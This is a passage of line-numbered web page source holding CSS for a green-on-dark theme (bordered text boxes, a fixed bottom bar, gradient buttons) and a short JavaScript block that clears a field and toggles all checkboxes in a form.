1558 border: 2px solid #14ab00;
1559 padding: 3px;
1560 background-color: #303030;
1561 outline-color:#14ab00;
1562 }
1563 .textround {
1564 border: 2px solid #14ab00;
1565 padding: 3px;
1566 background-color: #303030;
1567 outline-color:#14ab00;
1568 -webkit-border-top-left-radius: 7px;
1569 -khtml-border-radius-topleft: 7px;
1570 -moz-border-radius-topleft: 7px;
1571 border-top-left-radius: 7px;
1572 -webkit-border-bottom-right-radius: 7px;
1573 -khtml-border-radius-bottomright: 7px;
1574 -moz-border-radius-bottomright: 7px;
1575 border-bottom-right-radius: 7px;
1576 -webkit-border-bottom-left-radius: 7px;
1577 -khtml-border-radius-bottomleft: 7px;
1578 -moz-border-radius-bottomleft: 7px;
1579 border-bottom-left-radius: 7px;
1580 -webkit-border-top-right-radius: 7px;
1581 -khtml-border-radius-topright: 7px;
1582 -moz-border-radius-topright: 7px;
1583 border-bottom-top-radius: 7px;
1584 }
1585 #xbox {
1586 width: 100%;
1587 position: fixed;
1588 bottom: 0;
1589 left: 0;
1590 height: 70px;
1591 padding: 5px;
1592 text-align: center;
1593 }
1594 #bottom{
1595 position:absolute;
1596 right:0%;
1597}
1598/* This imageless css button was generated by CSSButtonGenerator.com */
1599input[type=submit], input[type=button] {
1600 background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #14ab00), color-stop(1, #0f6f00) );
1601 background:-moz-linear-gradient( center top, #14ab00 5%, #0f6f00 100% );
1602 filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#14ab00', endColorstr='#0f6f00');
1603 background-color:#14ab00;
1604 -moz-border-radius:6px;
1605 -webkit-border-radius:6px;
1606 border-radius:6px;
1607 border:1px solid #303030;
1608 display:inline-block;
1609 color:#000000;
1610 font-family:arial;
1611 font-size:12px;
1612 font-weight:bold;
1613 padding:5px 10px;
1614 text-decoration:none;
1615}input[type=submit]:hover, input[type=button]:hover {
1616 background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #0f6f00), color-stop(1, #14ab00) );
1617 background:-moz-linear-gradient( center top, #0f6f00 5%, #14ab00 100% );
1618 filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#0f6f00', endColorstr='#14ab00');
1619 background-color:#0f6f00;
1620}input[type=submit]:active, input[type=button]:active {
1621 position:relative;
1622 top:1px;
1623}
1624</style>
1625<script type="text/javascript">
1626function removeValue() {
1627document.getElementById('ch').value='';
1628}
1629checked=false;
1630function checkall (checkboxall) {
1631 var aa= document.getElementById('checkboxall');
1632 if (checked == false)
1633 {
1634 checked = true
1635 }
1636 else
1637 {
1638 checked = false
1639 }
1640 for (var i =0; i < aa.elements.length; i++)
1641 {
1642 aa.elements[i].checked = checked;
1643 }
1644 }
1645</script>